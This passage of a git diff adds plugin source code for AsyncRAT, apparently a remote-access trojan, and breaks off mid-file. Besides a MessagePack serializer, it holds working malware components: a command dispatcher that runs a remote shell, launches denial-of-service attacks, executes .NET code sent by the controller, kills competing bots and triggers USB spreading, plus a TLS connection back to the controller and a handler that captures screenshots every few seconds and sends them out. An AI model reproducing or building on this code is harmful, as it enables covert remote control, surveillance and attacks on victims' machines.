+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj
new file mode 100644
index 0000000..e2862db
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj
@@ -0,0 +1,84 @@
+
+
+
+
+
+ Debug
+ AnyCPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}
+ Library
+ Properties
+ Miscellaneous
+ Miscellaneous
+ v4.0
+ 512
+ true
+
+
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+ ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
+
+
+ ..\..\..\..\..\LimeUSB-Csharp\LimeUSB-Csharp\IconLib.dll
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Packet.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Packet.cs
new file mode 100644
index 0000000..f0267cc
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Packet.cs
@@ -0,0 +1,114 @@
+using Miscellaneous.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static CancellationTokenSource ctsDos;
+
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "botKiller":
+ {
+ new HandleBotKiller().RunBotKiller();
+ Connection.Disconnected();
+ break;
+ }
+
+ case "limeUSB":
+ {
+ new HandleLimeUSB().Initialize();
+ Connection.Disconnected();
+ break;
+ }
+
+ case "torrent":
+ {
+ new HandleTorrent(unpack_msgpack);
+ Connection.Disconnected();
+ break;
+ }
+
+ case "shell":
+ {
+ HandleShell.StarShell();
+ break;
+ }
+
+ case "shellWriteInput":
+ {
+ if (HandleShell.ProcessShell != null)
+ HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
+ break;
+ }
+
+ case "dosAdd":
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "dosAdd";
+ Connection.Send(msgpack.Encode2Bytes());
+ break;
+ }
+
+
+ case "dos":
+ {
+ switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ {
+ case "postStart":
+ {
+ ctsDos = new CancellationTokenSource();
+ new HandleDos().DosPost(unpack_msgpack);
+ break;
+ }
+
+ case "postStop":
+ {
+ ctsDos.Cancel();
+ break;
+ }
+ }
+ break;
+ }
+
+
+ case "executeDotNetCode":
+ {
+ new HandlerExecuteDotNetCode(unpack_msgpack);
+ break;
+ }
+
+ }
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ }
+
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
new file mode 100644
index 0000000..0a440aa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
@@ -0,0 +1,34 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..22e3d5e
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+//[assembly: AssemblyTitle("Miscellaneous")]
+//[assembly: AssemblyDescription("")]
+//[assembly: AssemblyConfiguration("")]
+//[assembly: AssemblyCompany("")]
+//[assembly: AssemblyProduct("Miscellaneous")]
+//[assembly: AssemblyCopyright("Copyright © 2019")]
+//[assembly: AssemblyTrademark("")]
+//[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("37e20baf-3577-4cd9-bb39-18675854e255")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/packages.config b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/packages.config
new file mode 100644
index 0000000..f9dfbde
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/packages.config
@@ -0,0 +1,5 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options.sln b/AsyncRAT-C#/Plugin/Options/Options.sln
new file mode 100644
index 0000000..8caea37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Options", "Options\Options.csproj", "{6AA4E392-AAAF-4408-B550-85863DD4BAAF}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {F9806379-F782-4BAF-94F7-6E170E5E5631}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Connection.cs b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs
new file mode 100644
index 0000000..70a0271
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.Read(packet);
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlePcOptions.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandlePcOptions.cs
similarity index 97%
rename from AsyncRAT-C#/Client/Handle Packet/HandlePcOptions.cs
rename to AsyncRAT-C#/Plugin/Options/Options/Handler/HandlePcOptions.cs
index 373b978..c9f6595 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandlePcOptions.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandlePcOptions.cs
@@ -1,11 +1,10 @@
-using Client.Helper;
-using System;
+using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
public class HandlePcOptions
{
@@ -66,4 +65,5 @@ namespace Client.Handle_Packet
}
}
}
+
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleReportWindow.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleReportWindow.cs
similarity index 87%
rename from AsyncRAT-C#/Client/Handle Packet/HandleReportWindow.cs
rename to AsyncRAT-C#/Plugin/Options/Options/Handler/HandleReportWindow.cs
index a78b86d..ab7ebc1 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleReportWindow.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleReportWindow.cs
@@ -1,5 +1,4 @@
-using Client.MessagePack;
-using Client.Connection;
+using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@@ -7,7 +6,7 @@ using System.Linq;
using System.Text;
using System.Threading;
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
class HandleReportWindow
{
@@ -47,6 +46,7 @@ namespace Client.Handle_Packet
case "stop":
{
Packet.ctsReportWindow?.Cancel();
+ Connection.Disconnected();
break;
}
}
@@ -56,6 +56,11 @@ namespace Client.Handle_Packet
{
Packet.ctsReportWindow?.Cancel();
Packet.ctsReportWindow = new CancellationTokenSource();
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "reportWindow-";
+ Connection.Send(msgpack.Encode2Bytes());
+
title = new List();
foreach (string s in unpack_msgpack.ForcePathObject("Title").AsString.ToLower().Split(new[] { "," }, StringSplitOptions.None))
title.Add(s.Trim());
@@ -67,8 +72,9 @@ namespace Client.Handle_Packet
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "reportWindow";
msgpack.ForcePathObject("Report").AsString = window;
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
}
+
}
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleThumbnails.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleThumbnails.cs
new file mode 100644
index 0000000..645097e
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleThumbnails.cs
@@ -0,0 +1,48 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin.Handler
+{
+ public class HandleThumbnails
+ {
+ public HandleThumbnails()
+ {
+ try
+ {
+ Packet.ctsThumbnails?.Cancel();
+ Packet.ctsThumbnails = new CancellationTokenSource();
+
+ while (Connection.IsConnected && !Packet.ctsThumbnails.IsCancellationRequested)
+ {
+ Thread.Sleep(new Random().Next(2500, 7000));
+ Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
+ using (Graphics g = Graphics.FromImage(bmp))
+ using (MemoryStream memoryStream = new MemoryStream())
+ {
+ g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
+ Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
+ thumb.Save(memoryStream, ImageFormat.Jpeg);
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "thumbnails";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
+ msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
+ Connection.Send(msgpack.Encode2Bytes());
+ thumb.Dispose();
+ }
+ bmp.Dispose();
+ }
+ }
+ catch { }
